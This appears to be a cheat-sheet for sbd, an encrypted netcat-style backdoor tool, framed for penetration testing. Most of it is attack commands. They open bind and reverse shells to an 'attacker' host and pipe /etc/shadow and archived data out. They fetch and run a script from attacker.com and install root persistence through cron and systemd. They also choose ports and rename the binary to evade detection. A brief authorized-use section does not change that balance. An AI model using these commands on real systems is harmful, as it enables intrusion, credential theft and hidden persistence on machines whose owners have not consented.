sbd - Secure Backdoor

Overview

sbd (Secure BackDoor) is an encrypted, netcat-compatible command shell and file transfer tool that uses AES-CBC-128 encryption for secure communication. Unlike plain netcat, sbd encrypts all traffic, preventing network-based interception of commands and data. It’s essential for authorized penetration testing, red team exercises, and secure remote administration during controlled security assessments.

Key Capabilities:

• AES-CBC-128 encrypted communication channels
• Netcat-compatible command syntax and options
• Bi-directional encrypted data transmission
• Shell access and command execution
• File transfer and redirection support
• Cross-platform compilation (Linux, Unix, macOS, Windows with Cygwin)
• Lightweight and minimal dependencies

Installation

From Source on Linux

# Clone or download sbd source
git clone https://github.com/Kyuui/sbd.git
cd sbd

# Compile on Linux/Unix
gcc -o sbd sbd.c -lssl -lcrypto

# Or with optimization flags
gcc -O2 -Wall -o sbd sbd.c -lssl -lcrypto

Install OpenSSL Development Libraries (if needed)

# Debian/Ubuntu
apt-get update
apt-get install libssl-dev build-essential

# RHEL/CentOS
yum install openssl-devel gcc

# macOS
brew install openssl

# Arch Linux
pacman -S openssl base-devel

Via Kali Linux

# Pre-installed on Kali Linux
sbd --help

# Or install if not present
apt-get update
apt-get install sbd

Compile with Specific OpenSSL Path

# If OpenSSL is installed in custom location
gcc -o sbd sbd.c -I/usr/local/ssl/include -L/usr/local/ssl/lib -lssl -lcrypto

# Set library path for execution
export LD_LIBRARY_PATH=/usr/local/ssl/lib:$LD_LIBRARY_PATH
./sbd -h

Cross-Platform Compilation

# Compile for Windows (requires Cygwin)
gcc -o sbd.exe sbd.c -lssl -lcrypto

# Compile for macOS (using Homebrew OpenSSL)
gcc -o sbd sbd.c -I/usr/local/opt/openssl/include -L/usr/local/opt/openssl/lib -lssl -lcrypto

Verify Installation

sbd -h
sbd --help

Basic Usage

Server Mode (Listener)

# Create encrypted listening shell on port 4444
sbd -l -p 4444

# Listen with shell command (-e provides shell)
sbd -l -p 4444 -e /bin/bash

# Listen on specific interface
sbd -l -n 192.168.1.100 -p 4444 -e /bin/bash

Client Mode (Connect)

# Connect to encrypted sbd listener
sbd 192.168.1.100 4444

# Connect to specific port
sbd -n 192.168.1.100 -p 4444

# Connection with command execution
sbd target.com 4444

File Transfer Mode

# Receive file from remote sbd server
sbd -l -p 4444 > received_file.bin

# Send file to remote sbd server
sbd -l -p 4444 < file_to_send.bin

# Send file to target
cat file_to_send.bin | sbd target.com 4444

Common sbd Commands

Command	Purpose
-l	Listen mode (server)
-p PORT	Specify port number
-n HOST	Connect to host
-e CMD	Execute command upon connection
-q SECS	Set connection timeout (seconds)
-v	Verbose mode
-w SECS	Connection wait time
-c	Use CRLF instead of LF
-u	UDP mode (standard sbd uses TCP)
-h	Display help message

Encrypted Shell Access

Establish Encrypted Remote Shell

# On attacker machine (listener)
sbd -l -p 4444 -e /bin/bash

# On target machine (connect)
sbd attacker.com 4444

# Interactive shell commands over encrypted channel
ls -la
whoami
pwd
cat /etc/passwd

Create Interactive Command Shell

# Multi-command interactive session
sbd -l -p 4444 -e /bin/bash

# Connect and maintain persistent shell
sbd target.com 4444
# Type commands, all encrypted in transit

Practical Examples

Basic Encrypted Shell Server

# Start listening encrypted shell
sbd -l -p 9999 -e /bin/bash
# Waiting for connection on 0.0.0.0:9999

# From another machine, connect
sbd target-server 9999
# Shell is now available, encrypted with AES-CBC-128

File Exfiltration

# On target machine, exfiltrate sensitive file
cat /etc/shadow | sbd attacker-ip 4444

# On attacker machine, receive file
sbd -l -p 4444 > stolen_shadow.txt

# Verify received data
cat stolen_shadow.txt

Execute Single Command

# Send command through encrypted channel
echo "whoami" | sbd target.com 4444

# Capture output
sbd -q 5 target.com 4444 < /dev/null | tee command_output.txt

Bind Shell Backdoor

# Place sbd on compromised system
cp sbd /usr/local/bin/

# Create cron job to maintain shell
echo "*/5 * * * * /usr/local/bin/sbd -l -p 4444 -e /bin/bash" | crontab -

# Or systemd service
cat > /etc/systemd/system/sbd-shell.service << 'EOF'
[Unit]
Description=SBD Encrypted Shell
After=network.target

[Service]
Type=simple
ExecStart=/usr/local/bin/sbd -l -p 4444 -e /bin/bash
Restart=always
User=root

[Install]
WantedBy=multi-user.target
EOF

systemctl enable sbd-shell
systemctl start sbd-shell

Reverse Shell with sbd

# On attacker machine
sbd -l -p 4444 -e /bin/bash

# On target machine (reverse connect)
/path/to/sbd attacker-ip 4444 -e /bin/bash &

# Or one-liner
sbd attacker-ip 4444 -e /bin/bash &

Network Operations

Encrypted Port Forwarding

# Forward traffic through encrypted sbd tunnel
sbd -l -p 4444 -e /bin/bash

# Use shell to create further connections
nc -l -p 8000 -e /bin/bash
# Access through sbd tunnel

Parallel Connections

# Multiple encrypted connections
sbd -l -p 4444 -e /bin/bash &
sbd -l -p 4445 -e /bin/bash &
sbd -l -p 4446 -e /bin/bash &

# Connect to specific instances
sbd target 4444
sbd target 4445
sbd target 4446

Timeout Configuration

# Set connection timeout to 30 seconds
sbd -q 30 target.com 4444

# Set wait time before execution
sbd -w 5 -l -p 4444 -e /bin/bash

Advanced Techniques

Encrypted Reverse Shell Pipeline

# Create backdoor that sends output back encrypted
sbd -l -p 4444 | bash

# On target
bash -i >& /dev/tcp/attacker/4444 0>&1 | sbd attacker 4444

File Transfer with Compression

# Compress and transfer through encrypted channel
tar czf - /sensitive/data | sbd attacker 4444

# Receive and decompress
sbd -l -p 4444 > data.tar.gz
tar xzf data.tar.gz

Chainable Commands

# Command piping through encrypted channel
echo "cat /etc/passwd | wc -l" | sbd target 4444

# Multi-step commands
sbd target 4444 << 'EOF'
cd /tmp
wget http://attacker.com/script.sh
chmod +x script.sh
./script.sh
EOF

Background Persistence

# Launch sbd in background
sbd -l -p 4444 -e /bin/bash &

# Get job ID
jobs -l

# Reconnect at will
sbd target 4444

Integration with Penetration Testing Workflow

Post-Exploitation Shell

# After initial compromise (e.g., web shell)
# Deploy sbd for encrypted communications

# Transfer sbd binary
wget http://attacker.com/sbd -O /tmp/sbd
chmod +x /tmp/sbd

# Start encrypted shell server
/tmp/sbd -l -p 4444 -e /bin/bash &

# Connect securely
sbd target-ip 4444

Data Exfiltration

# Stage 1: Create listener
sbd -l -p 4444 > exfiltrated_data.bin

# Stage 2: On compromised system
tar czf - /sensitive/docs | sbd attacker 4444

# Stage 3: Extract data
tar xzf exfiltrated_data.bin

Command and Control

# Maintain C&C channel encrypted
sbd -l -p 4444 -e /bin/bash

# Provide encrypted communications to team
# Multiple operators connect for coordinated actions
sbd target 4444

Traffic Analysis and Detection Evasion

Encrypted Communication Detection

# Monitor for sbd activity (if needed)
netstat -tupan | grep 4444

# Check process listening
ss -tlnp | grep sbd

Port Selection Strategy

# Use high-numbered or common service ports
sbd -l -p 443 -e /bin/bash    # HTTPS port
sbd -l -p 80 -e /bin/bash     # HTTP port
sbd -l -p 22 -e /bin/bash     # SSH port (if available)
sbd -l -p 53 -e /bin/bash     # DNS port

Obfuscation Techniques

# Rename binary
cp sbd ss
./ss -l -p 4444 -e /bin/bash

# Use in cron with hidden process name
# (depending on system capabilities)

Troubleshooting

Connection Refused

# Verify listener is running
ps aux | grep sbd

# Check if port is listening
netstat -tulnp | grep 4444
ss -tulnp | grep 4444

# Verify firewall rules
iptables -L -n

OpenSSL Library Issues

# Check library dependencies
ldd ./sbd
# Should show libssl and libcrypto loaded

# Fix missing libraries
apt-get install libssl1.1

# Or link against static SSL
gcc -o sbd sbd.c -static -lssl -lcrypto

Connection Timeout

# Increase timeout value
sbd -q 60 target 4444

# Check network connectivity
ping target
traceroute target

Encryption Failures

# Verify OpenSSL version
openssl version

# Ensure AES-CBC-128 is supported
openssl enc -aes-128-cbc -l

# Rebuild with compatible OpenSSL
gcc -o sbd sbd.c -lssl -lcrypto

Performance and Optimization

Network Throughput

# sbd adds minimal overhead due to small encryption block size
# For high-speed transfers, monitor bandwidth

# Measure transfer speed
time cat largefile | sbd target 4444

# Monitor with iftop or nethogs
iftop -i eth0
nethogs eth0

CPU Usage

# AES-CBC-128 is CPU-efficient
# Monitor CPU during transfers
top -p $(pgrep sbd)

# For CPU-constrained systems, keep transfers small
# or split large files

Security Best Practices

Authorized Testing Only

• Use sbd only in authorized penetration testing environments
• Maintain clear rules of engagement and written authorization
• Document all sbd deployments and connections
• Clean up all sbd artifacts post-assessment

Secure Configuration

# Use non-standard high-numbered ports
sbd -l -p 47777 -e /bin/bash

# Restrict connections by IP (if possible)
# Use firewall rules to limit access
iptables -A INPUT -p tcp --dport 4444 -s 192.168.1.0/24 -j ACCEPT

# Monitor for unexpected sbd processes
find / -name sbd 2>/dev/null
ps aux | grep -v grep | grep sbd

Cleanup After Testing

# Remove deployed sbd binaries
find / -name sbd -delete

# Remove cron entries
crontab -r

# Remove systemd services
rm /etc/systemd/system/sbd-shell.service
systemctl daemon-reload

# Check for backdoor processes
ps aux | grep -E "sbd|nc|bash"

Alternative Encrypted Communication Tools

• socat - Netcat replacement with SSL/TLS support
• cryptcat - nc with simple encryption
• ncat - Netcat with SSL/TLS capabilities
• SSH tunneling - Industry standard encrypted shell access

Additional Resources

• OpenSSL Documentation and AES Encryption
• Penetration Testing with Encrypted Communications
• Network Encryption and Detection Evasion
• Command and Control Infrastructure Design
• Post-Exploitation Persistence Techniques